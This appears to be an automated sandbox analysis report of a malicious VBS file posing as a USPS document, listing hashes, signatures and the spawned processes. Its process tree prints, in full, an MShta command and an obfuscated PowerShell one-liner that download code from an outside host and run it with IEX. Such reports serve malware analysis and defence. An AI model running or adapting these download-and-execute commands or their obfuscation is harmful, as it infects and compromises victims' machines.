Analysis

  • max time kernel
    42s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    29-07-2022 18:19

General

  • Target

    usps54732563.vbs

  • Size

    523B

  • MD5

    f83e436ca7acf3f80ca706e118288f2b

  • SHA1

    2c760d46c138593186e359bef37a322dd3b73ece

  • SHA256

    442a2a8f6b9284cdec1fb7ff52faed051cba8337295e550389bbdd7bbc6c8c41

  • SHA512

    24a1ee24b6fb9387b70fa39ff22204a92dc25c1fbcd51f08fe50c776557ae5bd118bda68cc63e67a236aa3d98cb3add98d3189c4199bd227037e4ea8fdeb7f5a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\usps54732563.vbs"
    1⤵
      PID:1904
    • C:\Windows\system32\MShTa.exe
      MShTa https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\pOwErshEll.exe
      pOwErshEll $HWRKDYPCHLPUKFTAYIHIWUY = '[2+795<^}+8#}}8/86]=%4@y2+795<^}+8#}}8/86]=%4@t[8^^89_^1/!/2!4%%@0]!0\@^5+[)3=53%<9\$%\!5%}.IO.2+795<^}+8#}}8/86]=%4@t\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=\@^5+[)3=53%<9\$%\!5%}\$532(_-&(2+}/{)-8668%[8^^89_^1/!/2!4%%@0]!0%[6)5=$@571*!2!572[8#=d[8^^89_^1/!/2!4%%@0]!0\$532(_-&(2+}/{)-8668%]'.Replace('2+795<^}+8#}}8/86]=%4@','S').Replace('[8^^89_^1/!/2!4%%@0]!0','E').Replace('\$532(_-&(2+}/{)-8668%','R').Replace('%[6)5=$@571*!2!572[8#=','A').Replace('\@^5+[)3=53%<9\$%\!5%}','M');$HGISFOJLGHGTWKXFKWLERCP = ($HWRKDYPCHLPUKFTAYIHIWUY -Join '')|&('I'+'EX');$HESVVOTYARWSCGTNFQORXXS = '[_9)=9(14!<2=/}412*-3^[y_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{^]328{(/\894+8^/*23(}3m.N^]328{(/\894+8^/*23(}3#8!30%[-#@0}--_7!7^@3{.W^]328{(/\894+8^/*23(}3bR^]328{(/\894+8^/*23(}3qu^]328{(/\894+8^/*23(}3_9)=9(14!<2=/}412*-3^[#8!30%[-#@0}--_7!7^@3{]'.Replace('_9)=9(14!<2=/}412*-3^[','S').Replace('^]328{(/\894+8^/*23(}3','E').Replace('#8!30%[-#@0}--_7!7^@3{','T');$HIGABGCKCBROYYQALTYPZKR = ($HESVVOTYARWSCGTNFQORXXS -Join '')|&('I'+'EX');$HOGUKKKLZNQHLPITPFOIIEG = '{#}-*=102}(})4{9449-_5r=0+]3!<!+2=61*%@^=$&$<a6[23_^7*6^5)+^2+__!+5*=0+]3!<!+2=61*%@^=$&$<'.Replace('{#}-*=102}(})4{9449-_5','C').Replace('=0+]3!<!+2=61*%@^=$&$<','E').Replace('6[23_^7*6^5)+^2+__!+5*','T');$HJPBNVFRVKQYTURDRPQKTRO = '3$48{=)*!4+-4[}<+^54[71@[/!}2-7-[){(<$+%/)61tR1@[/!}2-7-[){(<$+%/)61\\#7[_<}*1+[#=@[#}^*\/pon\\#7[_<}*1+[#=@[#}^*\/1@[/!}2-7-[){(<$+%/)61'.Replace('3$48{=)*!4+-4[}<+^54[7','G').Replace('1@[/!}2-7-[){(<$+%/)61','E').Replace('\\#7[_<}*1+[#=@[#}^*\/','S');$HDXFLYZFQJTQAWVJJGZFEHJ = 'G\\692[355)4<1]5(_+2][%t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}pon\^3819{_672<%/*4<#{@7}\\692[355)4<1]5(_+2][%\^3819{_672<%/*4<#{@7}t}$8$99[3-&=3*52=7/(13#\\692[355)4<1]5(_+2][%am'.Replace('\^3819{_672<%/*4<#{@7}','S').Replace('\\692[355)4<1]5(_+2][%','E').Replace('}$8$99[3-&=3*52=7/(13#','R');$HTYWQAKBUXVLTSROKPPULHW = ']^\_<@-4!!<%4-1)({02](8/!<&\%39}##&-^(9%!)6#a4420=(@}=2&09<!1}})825To8/!<&\%39}##&-^(9%!)6#n4420=(@}=2&09<!1}})825'.Replace(']^\_<@-4!!<%4-1)({02](','R').Replace('8/!<&\%39}##&-^(9%!)6#','E').Replace('4420=(@}=2&09<!1}})825','D');&('I'+'EX')($HGISFOJLGHGTWKXFKWLERCP::new($HIGABGCKCBROYYQALTYPZKR::$HOGUKKKLZNQHLPITPFOIIEG('https://clever-ishizaka.45-86-146-20.plesk.page/bil1.txt').$HJPBNVFRVKQYTURDRPQKTRO().$HDXFLYZFQJTQAWVJJGZFEHJ()).$HTYWQAKBUXVLTSROKPPULHW())
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1012

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1012-56-0x000007FEF29B0000-0x000007FEF33D3000-memory.dmp
      Filesize

      10.1MB

    • memory/1012-57-0x000007FEF5F20000-0x000007FEF6A7D000-memory.dmp
      Filesize

      11.4MB

    • memory/1012-58-0x0000000001D64000-0x0000000001D67000-memory.dmp
      Filesize

      12KB

    • memory/1012-59-0x000000001B770000-0x000000001BA6F000-memory.dmp
      Filesize

      3.0MB

    • memory/1012-60-0x0000000001D64000-0x0000000001D67000-memory.dmp
      Filesize

      12KB

    • memory/1012-61-0x0000000001D6B000-0x0000000001D8A000-memory.dmp
      Filesize

      124KB

    • memory/1748-54-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
      Filesize

      8KB